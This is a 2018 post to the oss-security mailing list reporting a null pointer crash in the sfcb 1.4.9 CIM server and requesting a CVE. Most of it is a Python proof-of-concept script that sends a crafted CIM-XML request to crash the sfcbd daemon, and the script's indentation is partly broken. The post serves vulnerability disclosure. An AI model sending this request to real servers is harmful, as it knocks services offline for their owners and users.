Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 31 Jan 2018 22:44:22 +0800 (CST)
From: XinleiHe <hxl1999@...h.net>
To: oss-security@...ts.openwall.com
Subject: report a vulnerability in sfcb software.

Hi there,


I am XinleiHe. I will report a vulnerability in sfcb software.
SFCB is a CIM server for resource-constrained and embedded environments. It's offical website is sblim.sourceforge.net/wiki/index.php/Sfcb.
 
A null pointer vulnerabilty exists in sfcb newest version(1.4.9),a remote attacher can send a crafted packet trigger to this vulnerabilty , and make sfcbd DOS.
I want to apply a cve id for this vulnerabilty.




You can use following python code to reproduce this vulnerability.
--------------------------------------------------------------
import httplib
from xml.dom.minidom import Document
class write_xml(Document):
    def __init__(self):


        Document.__init__(self)
 
    def set_tag(self,tag):
        self.tag = tag
        self.cim = self.createElement(self.tag)
        #self.setAttribute("encoding", "utf-8")
        
        self.cim.setAttribute("CIMVERSION", "2.0")
        self.cim.setAttribute("DTDVERSION", "2.0")
        self.appendChild(self.cim)


        self.msg = self.createElement("MESSAGE")
        self.msg.setAttribute("ID", "4711")
        self.msg.setAttribute("PROTOCOLVERSION","1.0")
        self.cim.appendChild(self.msg)


        self.sim = self.createElement("SIMPLEREQ")
        self.msg.appendChild(self.sim)


        self.ime = self.createElement("IMETHODCALL")
        self.ime.setAttribute("NAME","EnumerateInstances")
        self.sim.appendChild(self.ime)


        self.local = self.createElement("LOCALNAMESPACEPATH")
        self.ime.appendChild(self.local)
       
        self.names1=self.createElement("NAMESPACE")
        self.names1.setAttribute("NAME", "root")
        self.local.appendChild(self.names1)


    def display(self):
        print self.toprettyxml(indent="   ")
    def retdata(self):
        return self.toprettyxml(indent="   ")


def httpreq(data):
conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
conn.request('POST', '/cimom',data)
res = conn.getresponse() 


def main():
wx = write_xml()
wx.set_tag('CIM')
print wx.retdata()
print httpreq(wx.retdata())


if __name__=='__main__':
main()
-------------------------------------------------------

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ